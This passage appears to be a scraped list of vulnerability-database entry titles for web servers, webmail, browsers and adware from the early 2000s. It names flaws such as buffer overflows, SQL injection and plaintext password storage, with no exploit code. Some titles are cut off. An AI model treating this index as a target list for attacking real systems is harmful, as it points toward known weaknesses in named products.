attempt hijacks Web page setting and redirects browsing sessions to obtain information [14454] PKings-IEHelper obtains information and acts as part of the Web browser to bypass software [14436] Netster Searchbar obtains information and acts as part of the Web browser to bypass software [14435] NetSource hijacks Web page setting [14429] NDG Systems hijacks Web page setting [14426] NavExcel attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14425] MyWebSearch Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14424] MyFastAccess Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14421] MSIEbho-Stub BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14418] MPGCom Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14416] MetaDirect hijacks Web page setting and redirects browsing sessions to obtain information [14413] MemoryMeter hijacks Web page setting and redirects browsing sessions to obtain information [14406] MadFinder hijacks Web page setting and redirects browsing sessions to obtain information [14402] Locators.com Toolbar obtains information and acts as part of the Web browser to bypass software [14400] Kontiki attaches to processes of Microsoft Internet Explorerand acts as part of the Web browser to bypass software [14396] JAJsoft.CSRS attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14383] IETop100 attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14382] IEmsg Hijacker hijacks Web page setting and redirects browsing sessions to obtain information [14375] HungryHands BHO hijacks Web page setting and redirects browsing sessions to obtain information [14369] HomepageWare hijacks Web page setting [14361] Gratisware displays advertisements and acts as part of the Web browser to bypass software [14357] GoHip hijacks Web page setting and redirects browsing sessions to obtain information and displays advertisements [14351] GigexAgent SpeedDelivery hijacks Web page setting and redirects browsing sessions to obtain information [14347] FreeScratchCards hijacks Web page setting and redirects browsing sessions to obtain information [14343] FirstCash Websearch displays advertisements [14339] FastWebFinder hijacks Web page setting and redirects browsing sessions to obtain information [14291] CoolWebSearch.Svinit hijacks Web page setting and redirects browsing sessions to obtain information [14290] CoolWebSearch redirects browsing sessions to obtain information and allows execution of code [14258] BeWeb SRL may establish dial-up connections without a user`s knowledge [14237] Microsoft URLScan Web server information disclosure [14211] BEA WebLogic Ant tasks could disclose administrator`s password [14210] BEA WebLogic JDK XML denial of service [14201] DansGuardian Webmin Module edit.cgi view and modify files [14196] Sun ONE Web Server buffer overflow [14186] SAP Internet Transaction Server (ITS) and Web Application Server multiple buffer overflows [14131] Webcam Watchdog HTTP GET buffer overflow [14121] GNU Mailman administrative Web page cross-site scripting [14087] Multiple Web browsers HTTP Referer header information disclosure [14068] DCAM WebCam Server &quot [14048] Active WebCam &quot [14047] Active WebCam error page cross-site scripting [14024] WebArtFactory CMS could allow unauthorized access to Web pages [13971] Unicenter Remote Control (URC) help interface allows elevated privileges [13968] Cyclonic WebMail spoof email messages [13966] Cyclonic WebMail allows access to stored email file [13964] Cyclonic WebMail sids subfolder session hijack [13938] @Mail WebMail System atmail.pl, search.pl, and reademail.pl scripts SQL injection [13936] @Mail WebMail System showmail.pl email access [13934] BNCweb BNCquery.pl script information disclosure [13923] WebEye Video Server information disclosure [13917] Abyss Web Server directory password bypass [13898] Websense Enterprise blocked sites cross-site scripting [13891] Sun ONE Web Server denial of service attack [13873] Adobe Macromedia JRun administrative interface cross-site scripting [13781] SqWebMail session hijacking [13775] phpWebFileManager index.php &quot [13774] SAP DB Web Database Manager generates predictable session IDs [13772] SAP DB web-tools installation has default services [13771] SAP DB Web Agent Administration long HTTP request buffer overflow [13770] SAP DB Web Agent Administration allows unauthorized access [13769] SAP DB web-tools &quot [13766] SAP DB niserver interface buffer overflow [13759] Web Wiz Forums register.php cross-site scripting [13756] WebWasher Classic proxy port cross-site scripting [13755] Symantec pcAnywhere help interface allows attacker to gain SYSTEM privileges [13752] BEA WebLogic MBeanHome allows attacker to obtain configuration information [13751] Multiple vendor programs Netlink interface spoofed message denial of service [13750] BEA WebLogic foreign Java Messaging Service provider password is stored in plain text [13749] BEA WebLogic malicious data causes denial of service of Node Manager [13747] BEA WebLogic Server and Express using the T3S protocol allows network monitoring to obtain information [13745] BEA WebLogic proxy plug-in causes denial of service [13742] Fortigate administrative interface cross-site scripting can disclose admin password [13650] Bugzilla Web feature could allow an attacker to obtain information [13643] SimpleWebServer &quot [13616] MLdonkey administrative interface allows attacker to obtain information [13581] Web Wiz Forums quote mode allows access to messages [13580] IA WebMail Server HTTP GET request buffer overflow [13572] Plug and Play Web Server GET request to port 8080 causes denial of service [13571] BRS WebWeaver Iong string in User-Agent field buffer overflow [13568] BEA WebLogic InteractiveQuery.jsp cross-site scripting [13549] SimpleWebServer referer variable of HTTP header buffer overflow [13533] WebTide file and directory disclosure [13496] HP Web-enabled management agents could allow an attacker to gain privileges [13486] Web Wiz Forums cross-site scripting in forum_members.asp, members.asp, and pm_buddy_list.asp scripts [13402] TinyWeb HTTP GET request denial of service [13379] File-Sharing for net and Forums Web Server Subject and Your Message fields cross-site scripting [13363] PHP-Nuke WebMail could allow an attacker to include PHP files [13362] Easy File Sharing Web Server HTTP request to log file or option.ini file information disclosure [13361] Easy File Sharing Web Server Your Message field buffer overflow [13360] Easy File Sharing Web Server Title field denial of service [13333] MPWeb Pro &quot [13309] webfs &quot [13308] webfs long pathname buffer overflow [13300] Microsoft Internet Explorer XML Web page containing Object Data tags could allow an attacker to execute code [13294] Savant Web Server HTTP GET request denial of service [13284] BRS WebWeaver fails to properly log IP addresses [13273] Engarde Guardian Digital WebTool password disclosure [13233] Plug and Play Web Server &quot [13219] Plug and Play Web Server multiple commands cause denial of service [13210] Yahoo! Webcam Viewer Wrapper ActiveX buffer overflow [13208] Forum Web Server improper validation by login script allows administrative access [13206] Forum Web Server &quot [13200] Easy File Sharing Web Server cross-site scripting in forum [13199] Easy File Sharing Web Server &quot [13174] 4D WebSTAR password buffer overflow [13161] Microsoft Internet Explorer allows an attacker to obtain cookies by opening Web site in _search window [13144] WebX and WebX Lite &quot [13127] EZ Web Site Builder &quot [13120] ICQ Web Front message field cross-site scripting [13115] FoxWeb PATH_INFO variable in foxweb.dll and foxweb.exe scripts buffer overflow [13096] WebCalendar multiple scripts allow SQL injection [13094] WebCalendar multiple scripts cross-site scripting [13087] Web Wiz Internet could allow access to the search_engine.mdb database file [13085] Web Wiz Journal could allow access to the journal.mdb database file [13083] Web Wiz Mailing could allow access to the mailing_list.mdb database file [13082] Web Wiz Guestbook could allow access to the WWGguestbook.mdb database file [13081] Web Wiz Polls could allow access to weekly_poll.mdb database file [13052] MPCSoftWeb Photo mpcsoftweb_photo.mdb containing usernames and passwords can be downloaded [13051] MPCSoftWeb Forum mpcsoftweb_forum.mdb containing usernames and passwords can be downloaded [13050] MPCSoftWeb Thread Tree mpcsoftweb_threadtree.mdb file containing usernames and passwords can be downloaded [13049] MPCSoftWeb Chat Xtra mpcsoftweb_chat_xtra.mde file containing usernames and passwords can be downloaded [12964] WebFtp accounts.dat plaintext password [12950] DWebPro http.ini file plaintext password [12948] oMail-webmail checklogin function code execution [12926] Sun ONE Web Server denial of service [12920] BEA WebLogic Server and Express, WebLogic Integration, and Liquid Data console application cross-site scripting [12896] phpWebSite Calendar module buffer overflow [12895] phpWebSite Calendar module path disclosure [12894] phpWebSite Calendar, Fatcat or PageMaster modules cross-site scripting [12891] phpWebSite Calendar module SQL injection [12890] Webdeskpro could allow an attacker to modify roles [12889] PostNuke Downloads.php and Web_links.php cross-site scripting [12884] Webware for Python malicious cookie could allow an attacker to execute code [12883] SkunkWeb Cache.py script directory traversal [12881] SkunkWeb Handler.py script cross-site scripting [12863] Web ChatServer cross-site scripting [12850] IBM Lotus Instant Messaging and Web Conferencing information disclosure [12843] D-Link DI-704P long HTTP request configuration Web page [12831] Novell iChain could allow an attacker to redirect URLs to malicious Web site [12820] Forum Web Server admin username default password [12799] BEA WebLogic Server and Express could allow an attacker to gain elevated privileges [12797] Novell NetWare with GroupWise WebAccess stores plaintext passwords in access_log file [12761] KDE Konqueror plaintext username and password transmitted to third party Web site [12747] Microsoft Windows RPC DCOM interface buffer overflow detected [12722] HP Color LaserJet 4550 administration interface cross-site scripting [12706] Novell NetWare Enterprise Web Server PERL handler buffer overflow [12664] WebCalendar &quot [12660] Compaq Web Agent HTTP GET request denial of service [12659] McAfee WebShield attachment can bypass content filter [12629] RPC DCOM interface buffer overflow [12628] WebJeff-Filemanager index.php3 directory traversal [12594] Twilight Utilities Web Server HTTP GET request buffer overflow [12567] BEA WebLogic could allow an attacker to gain access to the console [12566] BEA WebLogic Operator could allow attacker to gain administrative privileges [12565] BEA WebLogic Node Manager discloses keyfile password in plain text [12542] Rockliffe MailSite stats Web page information disclosure [12483] VisNetic WebSite path disclosure [12477] PinkNet Web Server &quot [12467] Abyss Web Server could allow an attacker to inject data into HTTP headers [12466] Abyss Web Server HTTP GET request buffer overflow [12456] WebBBS guestbook Name, Email, or Message fields cross-site scripting [12448] BRS WebWeaver error page cross-site scripting [12436] PHP-Nuke Web_Links module in modules.php script path disclosure [12426] Compaq Web Agent SSI buffer overflow [12425] WebAdmin user parameter buffer overflow [12409] Snowblind Web Server &quot [12406] Visnetic WebMail PHP source disclosure [12385] webfs long URL buffer overflow [12351] PHP-Nuke Sections, AvantGo, Surveys, Downloads, Reviews, and Web_Links modules SQL injection [12333] noweb noroff script temporary file symlink [12331] Aiglon web server path disclosure [12307] SLwebmail3 multiple requests denial of service [12296] Forum Web Server message cross-site scripting [12295] Forums Web Server &quot [12294] Forum Web Server stores password and username in User.ini in plain text [12293] Forum Web Server stores password and username in plain text [12287] WebBBS multiple denial of service [12286] Snowblind Web Server HTTP GET request buffer overflow [12285] Snowblind Web Server HTTP request denial of service [12284] Snowblind Web Server &quot [12283] silentThought Simple Web Server &quot [12280] MaxWebPortal password reset [12279] MaxWebPortal database file access [12278] MaxWebPortal could allow an attacker to modify form fields [12277] MaxWebPortal search.asp cross-site scripting [12269] Baby Web Server &quot [12265] Baby Web Server multiple connections denial of service [12232] Nuca WebServer &quot [12222] Synkron.web search module cross-site scripting [12209] Novell iChain could allow unauthorized access to a protected Web page [12191] D-Link administrative Web page denial of service [12167] Pi3Web Server ?SortName buffer overflow [12145] PHPWebChat users.php cross-site scripting [12144] PHPWebChat multiple scripts path disclosure [12142] PHPWebChat users.php path disclosure [12135] WebStores 2000 browse_item_details.asp SQL injection [12120] Webfroot Shoutbox $config file include [12111] Webfroot Shoutbox &quot [12107] BRS WebWeaver HTTP HEAD and HTTP POST request buffer overflow [12100] Microsoft IIS long WebDAV requests containing XML denial of service [11995] Web Server 4D HTTP GET request buffer overflow [11991] BEA WebLogic information disclosure [11990] BEA WebLogic CredentialMapper stores passwords in plain text [11989] BEA WebLogic JDBCConnectionPoolRuntimeMBean password displayed in plain text [11985] BEA WebLogic SSL CA-signed certificate spoofing [11984] PHP-Nuke Web_Links and Downloads modules SQL injection [11964] Multiple vendor Web browsers fail to properly validate digital certificates [11963] SLwebmail3 invalid request path disclosure [11962] SLwebmail3 ShowGodLog.dll unauthorized file access [11961] SLwebmail3 ISAPI DLL buffer overflows [11952] webcamXP multiple cross-site scripting [11926] Web Protector uses weak encryption algorithm [11891] Xeneo Web Server GET request denial of service [11889] Pi3Web GET request buffer overflow [11887] Xeneo Web Server packet with large payload buffer overflow [11875] WebAdmin WebAdmin.dll could allow an attacker to view files [11874] WebAdmin WebAdmin.dll path disclosure [11856] BRS WebWeaver RETR command denial of service [11819] Web Wiz Forums administrative password is stored in plain text [11809] Twilight Utilities Web Server HTTP GET denial of service [11800] iWeb Mini Web Server GET request directory traversal [11792] WebGUI HTTP request denial of service [11780] Web Wiz Site News administrative password is stored in plain text [11779] MailMax/WEB installation path stored in cookie [11765] WebC web.emf error message file format string [11764] WebC environment variable buffer overflow [11763] WebC configuration file symlink attack [11760] WebC Webc.cgi long script name URL request buffer overflow [11746] BEA WebLogic SSIServlet could allow an attacker to view source code [11721] Multiple vendor Web browsers LiveConnect malformed JavaScript page denial of service [11718] Abyss Web Server malformed HTTP GET request denial of service [11716] DeskNow Web Mail transmits password in plain text [11697] BEA WebLogic HTTP GET request information disclosure [11686] BRS WebWeaver testcgi.exe information disclosure [11682] BRS WebWeaver users.ini weak password encryption [11681] BRS WebWeaver overly long HTTP request denial of service [11680] BRS WebWeaver CD command denial of service [11661] Beanwebb Guestbook could allow unauthorized administrative access [11660] Beanwebb Guestbook add.php cross-site scripting [11625] PHP WEB CHAT register.php, login.php, and profile.php cross-site scripting [11587] XOOPS $xoopsOption Web root path disclosure [11558] BEA WebLogic insecure modify permission allows deletion of empty sub-contexts [11557] MyABraCaDaWeb index.php ma_kw cross-site scripting [11556] MyABraCaDaWeb index.php could disclose Web root path [11555] BEA WebLogic Servers Web application re-authentication bypass [11554] BEA WebLogic Servers internal WebLogic servlet unauthorized access [11539] Logan Pro and WebLog Expert HTTP header HTML injection [11537] Microsoft IIS WebDAV service is running on the system [11534] iPlanet Web Server hidden log entry [11533] Microsoft IIS WebDAV long request buffer overflow [11532] Multiple vendor Web servers and Web log analyzers cross-site scripting [11525] IBM Lotus Domino and Notes Client Web Retriever buffer overflow [11476] Forum Web Server subject and message fields cross-site scripting [11475] Forum Web Server upload directory traversal [11471] Dr. Web file name buffer overflow [11459] TYPO3 Web root directory exposes sensitive files [11451] WebChat defines.php file include [11443] WEB-ERP logicworks.ini unauthorized configuration access [11437] phpWebFileManager file.php directory traversal [11394] Novell GroupWise WebAccess script execution [11390] Webmin and Usermin session ID spoofing root access [11311] IBM Lotus Domino Web server &quot [11267] nPULSE vulnerability in Web server [11253] BEA WebLogic custom file could allow an attacker to gain SYSTEM user privileges [11245] IBM WebSphere uses weak encryption algorithm to store passwords in an exported XML file [11226] BEA WebLogic default servlet could allow an attacker to browse file contents [11225] BEA Tuxedo and WebLogic TDomain gateway authentication bypass [11223] BEA WebLogic SNMP Agent could disclose system password [11222] BEA WebLogic RMI could allow access to administrative configuration settings [11221] BEA WebLogic clustered environment race condition session sharing [11220] BEA WebLogic keystores store plaintext passwords [11219] BEA WebLogic CSR Generator could create insecure private keys [11218] BEA WebLogic Node Manager could disclose WebLogic Server password [11200] Compaq Web Agent Service session hijacking [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting [11195] Apache Tomcat web.xml could be used to read files [11172] simple web counter (swc) ctr parameter buffer overflow [11149] Multiple vendor Web servers HTTP TRACE method information disclosure [11103] RomPager embedded Web server cross-site scripting [11095] Shambala Web server username and password denial of service attack [11064] WebCollection Plus forward slash (/) directory traversal [11058] IBM Lotus Domino Web server authentication buffer overflow [11057] BEA WebLogic ResourceAllocationException could disclose system password [11044] vBB (versatileBulletinBoard) could allow unauthorized webmaster privileges [11034] BRS WebWeaver mkdir path disclosure [11033] BRS WebWeaver FTP mkdir directory traversal [11026] WebIntelligence could allow session hijacking [11021] GeneWeb URL request containing absolute path information disclosure [11003] H-Sphere WebShell flist() buffer overflow [11002] H-Sphere WebShell diskusage buffer overflow [11001] H-Sphere WebShell encodeFileName() command execution [10999] H-Sphere WebShell CGI::readFile() function buffer overflow [10972] iCal could disclose physical path of the Web server [10949] WEBppliance alias feature could allow an attacker to obtain sensitive information [10948] LocalWEB2000 users.lst file stores passwords in plain text [10941] web-cyradm IMAP daemon not running denial of service [10930] Oracle9i Application Server WEB-INF directory is accessible [10914] PHP-Nuke Web Mail module could allow an attacker to execute PHP commands [10904] Open WebMail Perl scripts could be used to execute commands [10902] OpenRatings add.phtml Web page SQL injection [10895] SHOUTcast Server Web administrative password is stored in plain text [10878] Infinite WebMail logger.cgi script cross-site scripting [10867] BEA WebLogic Xerces XML DTD parsing denial of service [10863] Webshots Desktop screensaver lock can be bypassed [10852] VisNetic Website HTTP_REFERER header cross-site scripting [10840] VisNetic Website URL request denial of service [10826] Adobe Macromedia ColdFusion and JRun Web services SOAP denial of service [10808] Netscape/iPlanet/Sun ONE Web Server log file script execution [10805] Enceladus Server Suite Web server &quot [10782] WebReflex &quot [10741] McAfee VirusScan WebScanX.exe module malicious DLL execution [10730] WsMp3 Web_server multiple buffer overflows [10729] Webster HTTP Server path name cross-site scripting [10728] Webster HTTP Server &quot [10727] Webster HTTP Server long URL buffer overflow [10724] pWins Web server &quot [10693] iPlanet (Sun ONE) Web Server admin Perl scripts open() command execution [10692] iPlanet (Sun ONE) Web Server admin error log cross-site scripting [10684] Open WebMail could disclose sensitive information [10643] Courier sqwebmail mail transport agent (MTA) fails to properly enforce permissions [10638] Savant Web Server HTTP Host header buffer overflow [10628] IBM HTTP Server could disclose the Web root path [10606] XOOPS WebChat module SQL injection [10601] INweb Mail Server HELO command buffer overflow [10600] Sun Solaris network interface TCP denial of service [10563] Simple Web Server could allow an attacker to access password protected files [10558] PortalApp users could gain elevated privileges on the Web portal [10534] Xeneo Web Server PHP version malformed HTTP request denial of service [10514] Linksys EtherFast gozila.cgi remote management interface denial of service [10503] Microsoft IIS WebDAV memory allocation denial of service [10501] Microsoft IIS administrative Web pages cross-site scripting [10499] Apache HTTP Server WebDAV HTTP POST view source [10467] BRS WebWeaver could allow an attacker to access password protected files [10461] KF Web Server malformed HTTP header buffer overflow [10454] IBM Web Traffic Express (WTE) HTTP header injection cross-site scripting [10453] IBM Web Traffic Express (WTE) HTML tag cross-site scripting [10452] IBM Web Traffic Express (WTE) /cgi-bin/helpout.exe denial of service [10447] Web Server 4 Everyone HTTP &quot [10429] IBM Lotus Domino Web request truncation allows remote administrative access [10392] BEA WebLogic security policy is ignored when migrating certain applications [10391] PlanetWeb long URL buffer overflow [10390] IBM AIX WebSecure (DSFWEB) has insecure configuration scripts [10388] Microsoft SQL Server Web tasks could allow elevated privileges [10381] Webmin ships with identical SSL keys [10373] Web Server 4 Everyone hexadecimal URL encoded forward-slash directory traversal [10372] Web Server 4 Everyone long file name request buffer overflow [10367] SimpleWebServer overly long URL denial of service [10364] Simple, secure webserver malformed URL denial of service [10363] Simple, secure webserver could disclose network topology [10360] Polycom ViaVideo Web server multiple incomplete requests denial of service [10359] Polycom ViaVideo Web server GET request buffer overflow [10349] MyWebServer long HTTP denial of service [10322] SurfControl SuperScout Email Filter Administrative Web server GET denial of service [10321] SurfControl SuperScout Email Filter Administrative Web server empty Content-Length denial of service [10320] SurfControl SuperScout Email Filter Administrative Web server plaintext passwords and usernames [10291] BEA WebLogic Servlet and EJB security restriction removal [10284] Oracle9i Application Server Web Cache Manager tool denial of service [10256] phpWebSite HTML IMG tags article.php script cross-site scripting [10248] SurfControl SuperScout Web Filter information retrieval [10247] SurfControl SuperScout Web Filter weak encryption algorithm [10245] SurfControl SuperScout Web Filter SQL injection [10244] SurfControl SuperScout Web Filter &quot [10242] SurfControl SuperScout Web Filter GET request denial of service [10221] BEA WebLogic HTTP response could disclose sensitive information to unintended users [10207] phpWebSite multiple instances could allow an attacker to gain administrative privileges [10205] EMU Webmail emumail.cgi address cross-site scripting [10204] EMU Webmail could disclose the Web root path [10198] Web Server 4D plaintext passwords and usernames [10191] acWEB Web server cross-site scripting [10190] acWEB Web server DOS device name request denial of service [10189] Null Webmail wmprintf() format string [10187] Oracle Web Cache administrative pages buffer overflow [10182] HAMweather hwadmin.cgi script allows Web administration access [10168] Dinos Webserver URL encoded &quot [10167] HP WEBES Compaq Analyze service allows unauthorized file access [10164] phpWebSite modsecurity.php could be used to include remote PHP files [10140] IBM WebSphere HTTP Host: header buffer overflow [10136] DB4Web can be used to make TCP connections to other systems [10124] PlanetWeb GET request long URL buffer overflow [10123] DB4Web db4web_c directory traversal [10104] Savant Web server could allow an attacker to access protected folders [10103] Savant Web server negative Content-Length denial of service [10102] Savant Web server cgitest.exe buffer overflow can crash the server [10076] Savant Web server long URL buffer overflow [10072] SWS Web Server recv() memory overwrite [10071] SWS Web Server invalid file request denial of service [10070] SWS Web Server &quot [10063] Wordtrans wordtrans-web wordtrans.php could be used to execute malicious code [10059] Wordtrans wordtrans-web wordtrans.php cross-site scripting [10052] Webmin Printer Administration shell command execution [10051] Web Server 4 Everyone hexadecimal URL encoded directory traversal [10025] Cisco VPN 3000 series concentrators HTML interface denial of service [10024] Cisco VPN 3000 series concentrators could allow unauthorized access to Web pages [10019] Cisco VPN 3000 series concentrators administrative Web page contains plaintext user passwords [10005] SWS Web Server string without a newline (\n) could cause a denial of service [9983] Webmin remote_foreign_require and remote_foreign_call CGI improperly validates user permissions [9957] Abyss Web Server allows unauthorized admin console access [9956] Abyss Web Server file disclosure when the plus (+) character is appended to an HTTP request [9941] Abyss Web Server allows directory traversal using specially-crafted GET request [9940] Abyss Web Server allows directory traversal using hexadecimal URL encoded HTTP request [9931] Microsoft Office Web Components MS02-044 patch is not installed on the system [9925] WebEasyMail POP3 username/password brute force attack [9924] WebEasyMail SMTP server format string attack results in denial of service [9905] Kerio WebServer Webmail cross-site scripting [9884] GoAhead WebServer malformed long URL buffer overflow [9867] Novell NetWare Web Search Server cross-site scripting [9866] IceWarp Web Mail address book user name cross-site scripting [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions [9862] MyWebServer invalid directory path could disclose path to Web root directory [9861] MyWebServer long HTTP request cross-site scripting [9859] MyWebServer search request buffer overflow [9841] Oracle9i Application Server Web Cache password is not encrypted [9817] Web Shop Manager search box could allow remote command execution [9812] Falcon Web Server 301 or 404 error message cross-site scripting [9807] IceWarp Web Mail static session ID [9799] iPlanet (Sun ONE) Web Server chunked transfer encoding heap buffer overflow [9784] Microsoft Content Management Server (MCMS) Web authoring file execution [9782] Trackeur de visiteurs could allow an attacker to disable Web usage tracking [9780] PhpWebGallery cookie modification could allow administrative access [9767] 602Pro LAN SUITE 2002 Web server device request denial of service [9757] Multiple vendor Web browser FTP view cross-site scripting [9732] Microsoft Office Web Components (OWC) could allow a remote attacker to execute code [9730] Squid Web Proxy Cache is running on the system [9726] Multiple vendor Web browsers JavaScript &quot [9722] Ipswitch IMail Web Calendaring (iwebcal) empty Content-Length POST denial of service [9721] Abyss Web Server slash (&quot [9679] Ipswitch IMail Web Messaging daemon buffer overflow [9676] Linux kernel ifconfig could fail to show that a network interface is in promiscuous mode [9631] Java Web Start .jnlp file could allow remote code execution [9615] IMHO Webmail module for Roxen WebServer could allow mail session hijacking [9590] Resin DOS device request could disclose path to Web root directory [9586] Jigsaw /aux request could disclose path to Web root directory [9550] Xeneo Web Server (WebMan) &quot [9540] ActivWebserver HTML tag cross-site scripting [9537] Microsoft Internet Explorer WebBrowser control OBJECT property could allow cross domain scripting [9519] GoAhead WebServer hexadecimal URL encoded &quot [9518] GoAhead WebServer 404 message cross-site scripting [9517] iPlanet Web Server search engine NS-query-pat file viewing [9506] iPlanet Web Server search enabled NS-rel-doc-name buffer overflow [9503] Webresolve long hostname buffer overflow [9501] MyWebServer long URL buffer overflow [9500] KF Web Server NULL byte character could allow an attacker to view directory contents [9486] BEA WebLogic Server race condition denial of service [9482] Squid Web Proxy Cache msnt_auth buffer overflow [9481] Squid Web Proxy Cache multiple FTP directory buffer overflows [9480] Squid Web Proxy Cache multiple gopher buffer overflows [9479] Squid Web Proxy Cache FTP data channels could allow data injection or data hijacking [9478] Squid Web Proxy Cache authentication header forwarding information disclosure [9446] Multiple vendor /WEB-INF./ could allow an attacker to retrieve arbitrary files [9435] Xitami Web server errors.gsl cross-site scripting [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path [9387] BasiliX Webmail allows malicious user to view attachments in the /tmp/BasiliX folder [9386] BasiliX Webmail allows remote attacker to obtain sensitive files [9385] BasiliX Webmail vulnerable to SQL injection [9384] BasiliX Webmail subject and message headers allow cross-site scripting [9378] WebBBS followup allows remote attacker to execute commands [9377] Cisco ONS15454 TCC LAN interface denial of service [9373] webMathematica &quot [9371] NetGear RP114 Web Safe Router allows external access by default [9353] Cisco Secure ACS Web server component cross-site scripting [9343] Mozilla and Netscape Web browsers POP3 denial of service [9312] zenTrack invalid ticket ID could disclose the path to the Web root directory [9296] WebCalendar .inc files could be used to obtain sensitive information [9287] Links Web browser large PNG image buffer overflow [9285] TeeKai`s Forum cookie manipulation could allow administrative access to the Web forum [9225] Shambala Web server malformed GET request denial of service [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory [9179] Falcon Web Server could allow an attacker to access password protected files [9165] LocalWEB2000 could allow an attacker to bypass protection and view restricted files [9149] Xitami Web server CGI errors could reveal source code [9147] Deerfield.com WebSite Pro 8.3 short file name source disclosure [9118] Red Hat Stronghold Secure Web server request for sample script could reveal path to Web root [9099] Seminole Webserver invalid HTTP request heap corruption [9098] Seminole Webserver empty request denial of service [9084] Microsoft Internet Explorer NetBIOS connection could allow rendering of Web sites with incorrect security zone [9071] NOCC Webmail client cross-site scripting [9070] DevBB Web forum software install.php could allow an attacker to gain administrative access [9037] Webmin and Usermin could allow an attacker to spoof a session ID [9036] Webmin and Usermin authentication page error cross-site scripting [9028] Lidek Webserver &quot [9004] askSam Web Publisher path disclosure [9003] askSam Web Publisher cross-site scripting [8996] 4D Web Server username and password buffer overflow [8977] Mozilla, Netscape, and Galeon Web browsers Cascading Style-Sheets (CSS) could allow an attacker to determine a file`s existence [8967] BEA WebLogic malformed URL request could reveal JSP source code [8966] BEA WebLogic Server DOS device %00 request denial of service [8965] BEA WebLogic Server malformed request could reveal full path to root directory [8922] IPC@CHIP Web server root directory is set to the system root [8865] WebTrends Reporting Center profile variable real path disclosure [8864] WebTrends Reporting Center long string buffer overflow [8862] Microsoft BackOffice Server allows attacker to bypass authentication for Web administration pages [8861] Web+ long cookie buffer overflow [8849] StepWeb Search (SWS) insecure admin page [8837] Webalizer reverse DNS lookup buffer overflow [8836] EMU Webmail allows local attacker to execute arbitrary programs using a malicious HTTP Host value [8827] IBM Informix Web Datablade Module HTML decoding of SQL Query [8826] IBM Informix Web Datablade Module allows SQL injection attack [8825] IBM Tivoli Storage Manager Web server port 1580 login buffer overflow [8816] Microsoft Internet Explorer does not clear local Web cache [8805] Abyss Web Server retrieves configuration file using hexadecimal URL encoded &quot [8768] Horde IMP invalid PHP file request could disclose the Web root path [8766] EMU Webmail emumail.cgi allows remote attacker to view arbitrary files [8650] Instant Web Mail could allow the execution of POP3 commands [8630] jo! Web server JSP error message cross-site scripting [8628] Squid Web Proxy Cache DNS reply denial of service [8624] WebSight Directory System cross-site scripting [8611] Microsoft Outlook IFRAME tags allows malicious Web sites to embed URLs [8606] HP Praesidium Webproxy could allow unauthorized remote access [8598] Webmin stores plain text usernames and passwords in the /etc/webmin/servers directory [8596] Webmin function allows local attacker to execute script code [8595] Webmin uses insecure permissions for some directories [8535] Web site is being copied [8507] WebEvent first time script could allow unauthorized administrative access [8483] Java Web Start could allow an attacker to access restricted resources [8472] ARSC non-existent language file reveals Web root path information [8471] Microsoft Internet Explorer dotless IP variant could allow rendering of Web sites with incorrect Security Zone [8459] Foundry Networks ServerIron Web switches incomplete URL decoding in pattern matching could reveal source code [8446] Web+ long WML script request buffer overflow [8425] Trend Micro InterScan VirusWall could allow virus infected Web pages to bypass the HTTP proxy filtering [8418] Excite for Web Servers password is weakly encrypted [8417] Excite for Web Servers password replay attack [8415] Tunnel interface exists on the router [8374] WebCart directories and files are readable by default [8361] Web+ webpsvc.exe buffer overflow [8355] Oracle Web Listener could allow a remote attacker to bypass restrictions using hexadecimal URL encoded characters [8348] Multiple Web browsers for Mac OS and Mac OS X could allow automatic file downloads [8298] Worldgroup Web server long GET request buffer overflow [8285] iPlanet Web Server &quot [8258] Squid Web Proxy Cache ftpBuildTitleUrl() function buffer overflow [8255] NetWin WebNEWS CGI has default user accounts [8250] ScriptEase: Mini WebServer malformed GET requests denial of service [8249] Essentia Web Server long request denial of service [8248] Essentia Web Server &quot [8236] ScriptEase: Mini WebServer long HTTP request denial of service [8233] Dinos Webserver log tag buffer overflow [8229] ICQ 99a built-in Web server could allow an attacker to determine the existence of files on the system [8221] Slashcode Web sites allow cross-site scripting [8220] NetWin WebNEWS CGI &quot [8215] Phusion Web Server long GET buffer overflow [8213] Phusion Web Server long URL denial of service [8212] Phusion Web server &quot [8208] Lasso Web Data Engine long request denial of service [8189] Falcon Web Server could allow an attacker to access protected virtual directories [8093] PHPWebThings allows remote attacker to call core/main.php script directly [8070] Mrtg/RRD 14all.cgi could reveal the path to the Web root directory [8027] Mandrake Linux default Apache configuration has remote management interface enabled [7977] Caldera UnixWare and OpenUnix Webtop cgi scripts command execution [7973] Mozilla and Netscape Web browsers could allow an attacker to steal cookie-based authentication information [7960] Cyberstop Easy Webserver long URL request denial of service [7959] Cyberstop Easy Webserver MS-DOS device name request denial of service [7931] hellbent Web server hellbent.prefs file could allow an attacker to obtain sensitive information [7930] hellbent Web server relative Web root path disclosure [7880] Pi3Web HTTP Server long CGI parameter buffer overflow [7879] Web Server 4D/eCommerce long URL denial of service [7878] Web Server 4D/eCommerce &quot [7853] Dinos Webserver &quot [7845] Netscape Enterprise Server and iPlanet Web Server ?wp-force-auth command brute force attack [7843] Multiple Web browsers support SSL without validating certificates [7842] Netscape Enterprise Server and iPlanet Web Server ?wp-html-rend command denial of service [7808] BEA WebLogic DOS device JSP request denial of service [7790] BOOZT! Web admin long name buffer overflow [7786] Savant Web server long file parameter value buffer overflow [7779] Anti-Web HTTPD (awhttpd) tpbuf (/) buffer overflow [7778] Anti-Web HTTPD (awhttpd) denial of service if F: is removed from the Anti-Web script [7777] Anti-Web HTTPD (awhttpd) invalid file retrieval denial of service [7773] ActivePerl could reveal path to the Web root [7768] Oracle9iAS Web Cache stores admin password in $ORACLE_HOME/webcache/webcache.xml [7766] Oracle9iAS Web Cache allows an attacker to gain privileges using webcached daemon [7765] Oracle9iAS Web Cache null characters denial of service [7726] ScriptEase:Webserver Edition sample script Novell NetWare &quot [7716] IBM Tivoli SecureWay Policy Director WebSEAL proxy denial of service [7711] Webmin &quot [7709] Microsoft Windows multiple vendor Web 